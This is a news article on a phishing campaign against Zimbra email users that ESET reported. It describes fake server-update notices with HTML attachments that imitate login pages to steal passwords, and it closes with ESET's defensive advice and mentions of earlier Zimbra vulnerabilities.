New credential stealing campaign targets Zimbra email accounts

A phishing email notifies users about an upcoming email server update that could lead to temporary account deactivation

New phishing campaign targets Zimbra email server accounts to steal login credential

Image:
New phishing campaign targets Zimbra email server accounts to steal login credential

Since at least April 2023, an ongoing phishing campaign has been actively targeting users of Zimbra Collaboration email servers, with an aim to illegally obtain users' login credentials, which are then used in subsequent operations.

Zimbra is a collaborative software suite encompassing an email server alongside a web client interface.

As outlined in an ESET report, an anonymous malicious actor has been deploying phishing emails across global organisations starting from April 2023, with no specific focus on specific sectors or entities.

The majority of organisations targeted by the actor are situated in Poland, Ecuador, Mexico, Italy and Russia.

A phishing email seems to come from Zimbra's admin, notifying users about an upcoming email server update that could lead to temporary account deactivation or a similar problem.

Recipients are prompted to open an attached HTML file for further details on the server upgrade and to review guidelines for preventing account deactivation.

Within the HTML file, there exists a Zimbra login page that is meticulously customised for the specific organisation being targeted.

The Username field is conveniently pre-populated with the victim's email address, making it appear like an authentic page.

When passwords are input, they are harvested from the HTML form and subsequently transmitted through an HTTPS POST request to a server under the control of the malicious actor.

ESET's findings reveal that in certain cases, the attackers employ compromised administrator accounts to establish fresh mailboxes. These newly created mailboxes are then used for spreading phishing emails to other members within the targeted organisation.

Although the campaign lacks technical complexity, its strategy hinges on "the fact that HTML attachments contain legitimate code," and "the only telltale element is a link pointing to the malicious host," said ESET researcher Viktor Šperka.

"This way, it is much easier to circumvent reputation-based antispam policies, compared to phishing techniques where a malicious link is directly placed in the email body," he added.

"The popularity of Zimbra Collaboration among organisations expected to have lower IT budgets ensures that it stays an attractive target for adversaries."

To avoid compromise, ESET suggests adhering to fundamental security practices: employing robust passwords, implementing multi-factor authentication, and upgrading to the latest version of the software.

Hackers frequently set their sights on Zimbra Collaboration email servers either to amass internal communications or to leverage them as an initial breach point for infiltrating the network of the targeted organisation.

Earlier this year, Proofpoint disclosed that the Russian hacking group known as 'Winter Vivern' took advantage of a vulnerability within Zimbra Collaboration to gain entry into the webmail interfaces of organisations aligned with NATO, governments, diplomats, and military personnel.

Last month, Zimbra publicly acknowledged a cross-site scripting (XSS) vulnerability within its Zimbra Collaboration Suite.

Maddie Stone, a researcher from Google Threat Analysis Group, claimed at the time that the flaw was actively exploited by attackers.